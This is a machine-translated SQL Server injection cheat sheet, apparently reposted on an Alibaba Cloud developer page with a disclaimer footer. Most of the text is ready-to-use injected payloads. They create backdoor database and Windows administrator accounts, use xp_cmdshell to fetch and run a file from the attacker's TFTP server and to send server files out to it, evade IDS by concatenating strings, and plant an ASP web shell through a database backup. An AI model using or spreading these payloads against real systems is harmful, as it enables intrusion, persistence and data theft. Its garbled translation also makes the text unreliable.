Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞
server|sqlserver| Advanced | Skills now put veterans ' own years of SQL Server into advanced skills to support veterans ' friends:
This is the advanced technique, and the other basic injection methods are not detailed.
Can not read the injection of this site to the basic article.
In order to better use the injection, we suggest that we take a look at this site's SQL grammar related articles
[Get all database names]
The value of select name from master.dbo.sysdatabases where Dbid=7//dbid is more than 7 is a user database
[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]
Select top 1 name from database name. dbo.sysobjects where xtype= ' U ' and status>0 and name not in (' table ')
[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]
Select top 1 database name. Dbo.col_name (object_id (' data table name to query '), field column such as: 1 [Where Condition]
Build database administrator account and system administrator account through SQL Server Injection vulnerability [current account must be sysadmin group]
News.asp?id=2;exec Master.dbo.sp_addlogin test,test;--//Add database user User test, password is test
News.asp?id=2;exec Master.dbo.sp_password test,123456,test;--//If you want to change the password, use this sentence (change the password of test to 123456)
News.asp?id=2;exec Master.dbo.sp_addsrvrolemember test,sysadmin;--//Add test to the sysadmin group, the members of this group can perform any action
News.asp?id=2;exec Master.dbo.xp_cmdshell ' net user Test Test/add ';--//Add System user test, password is test
News.asp?id=2;exec Master.dbo.xp_cmdshell ' net localgroup Administrators Test/add ';--promote system user test to Administrator
So, you've left the test administrator account in his database and system.
Here's how to download a file from your file.exe to run it [if you have to set your computer as a TFTP server, open 69 ports]
id=2; exec master.dbo.xp_cmdshell ' tftp–i your IP get file.exe ';--
Then run this file:
id=2; exec master.dbo.xp_cmdshell ' file.exe ';--
Download server file File2.doc to local TFTP server [file must exist]:
id=2; exec master.dbo.xp_cmdshell ' tftp–i your IP put File2.doc ';--
Bypass IDs detection [using variables]
declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '
The new addition:
Build a table. There is only one field, the type is image, and the ASP content is written. Export Database as File
Backup Database dbname to disk= ' d:\web\db.asp ';
Error to get system OS and database system version number
id=2 and 1<> (select @ @VERSION);
This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or
reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or
complaint, to firstname.lastname@example.org. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
and provide relevant evidence. A staff member will contact you within 5 working days.